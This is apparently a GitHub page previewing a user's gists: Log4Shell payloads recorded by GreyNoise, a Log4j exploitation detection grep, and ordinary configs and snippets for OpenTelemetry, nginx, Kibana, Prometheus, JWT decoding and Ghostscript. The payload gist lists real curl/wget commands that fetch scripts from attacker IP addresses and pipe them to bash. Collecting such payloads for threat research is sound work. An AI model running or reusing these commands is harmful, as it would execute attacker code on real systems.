Romain Dauby r0mdau

@nathanqthai
nathanqthai / base64_payloads.csv
Last active October 14, 2023 13:21
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active September 11, 2024 21:41
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all subfolders:

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@jpkrohling
jpkrohling / loadbalancer.otel.yaml
Created July 21, 2021 14:06
Load balancer config for otelcol
receivers:
otlp/loadbalancer:
protocols:
grpc:
endpoint: localhost:4317
otlp/backend-1:
protocols:
grpc:
endpoint: localhost:55690
otlp/backend-2:
@FZambia
FZambia / main.go
Last active August 15, 2023 04:36
Experimenting with QUIC and WebTransport in Go, see original post: https://centrifugal.github.io/centrifugo/blog/quic_web_transport/
package main
import (
"context"
"crypto/tls"
"encoding/binary"
"errors"
"io"
"log"
"net/url"
@mancubus77
mancubus77 / gist:447281619be3731461b73dd4a18593c5
Last active July 31, 2023 08:40
Prometheus node exporter init.d (Centos6/RHEL6)
#!/bin/bash
#
# /etc/rc.d/init.d/node_exporter
#
# Prometheus node exporter
#
# description: Prometheus node exporter
# processname: node_exporter
# Source function library.
@thomasdarimont
thomasdarimont / readme.md
Last active October 30, 2024 03:31
Example for decoding a JWT Payload with your Shell (bash, zsh...)

Setup

Add this to your .profile, .bashrc, .zshrc...

decode_base64_url() {
  local len=$((${#1} % 4))
  local result="$1"
  if [ $len -eq 2 ]; then result="$1"'=='
  elif [ $len -eq 3 ]; then result="$1"'=' 
  fi
 echo "$result" | tr '_-' '/+' | openssl enc -d -base64
@r0mdau
r0mdau / Kibana-readonly.md
Last active July 29, 2020 06:54
Kibana readonly over internet

Kibana Readonly

With this tip, Kibana can't be modified, so you can share the URI with anyone on the internet. It's a network-level method to protect Kibana from changes by anonymous users.

Quick start

  1. You need a working Kibana instance exposed over HTTP on the internet.
  2. On the same Elasticsearch server, install nginx: apt-get install nginx
  3. In the directory /etc/nginx/sites-available, create a new file and edit it, for example: vi /etc/nginx/sites-available/kibana-readonly
  4. Write the following configuration:
@brenopolanski
brenopolanski / merge-pdf-ghostscript.md
Last active September 28, 2024 22:54
Merge multiple PDFs using Ghostscript

A simple Ghostscript command to merge two PDFs in a single file is shown below:

gs -dNOPAUSE -sDEVICE=pdfwrite -sOUTPUTFILE=combine.pdf -dBATCH 1.pdf 2.pdf

Install Ghostscript:

Type the command sudo apt-get install ghostscript to download and install the ghostscript package and all of the packages it depends on.

@plentz
plentz / nginx.conf
Last active November 16, 2024 14:10
Best nginx configuration for improved security(and performance)
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048